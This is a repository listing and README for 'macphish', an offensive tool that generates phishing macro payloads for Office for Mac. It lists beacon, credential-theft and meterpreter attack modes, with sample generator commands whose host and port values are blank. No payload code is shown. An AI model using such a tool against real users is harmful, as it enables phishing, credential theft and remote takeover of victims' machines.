https://github.com/cldrn/macphish
Office for Mac Macro Payload Generator
https://github.com/cldrn/macphish
applescript macos macros office osx phishing
Last synced: about 2 months ago
JSON representation
Office for Mac Macro Payload Generator
- Host: GitHub
- URL: https://github.com/cldrn/macphish
- Owner: cldrn
- License: mit
- Created: 2017-02-15T15:02:53.000Z (over 8 years ago)
- Default Branch: master
- Last Pushed: 2017-09-19T16:35:57.000Z (almost 8 years ago)
- Last Synced: 2025-04-01T00:09:56.841Z (3 months ago)
- Topics: applescript, macos, macros, office, osx, phishing
- Language: Python
- Homepage: https://github.com/cldrn/macphish
- Size: 730 KB
- Stars: 240
- Watchers: 19
- Forks: 50
- Open Issues: 3
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# macphish
Office for Mac Macro Payload Generator
## Attack vectors
There are 4 attack vectors available:
* beacon
* creds
* meterpreter
* meterpreter-grant
For the 'creds' method, macphish can generate the Applescript script directly, in case you need to run it from a shell.
### beacon
On execution, this payload will signal our listening host and provide basic system information about the victim. The simplest way of generating a beacon payload is:
```
$./macphish.py -lh
```
By default, it uses curl but other utilities (wget, nslookup) can be used by modifying the command template.
### creds
```
$./macphish.py -lh -lp -a creds
```
### meterpreter
The simplest way of generating a meterpreter payload is:
```
$./macphish.py -lh -lp -p -a meterpreter
```
### meterpreter-grant
The generate a meterpreter payload that calls GrantAccessToMultipleFiles() first:
```
$./macphish.py -lh -lp -p -a meterpreter-grant
```
For meterpreter attacks, only python payloads are supported at the moment.
## Usage
See https://github.com/cldrn/macphish/wiki/Usage
## PoCs
*
*
*
*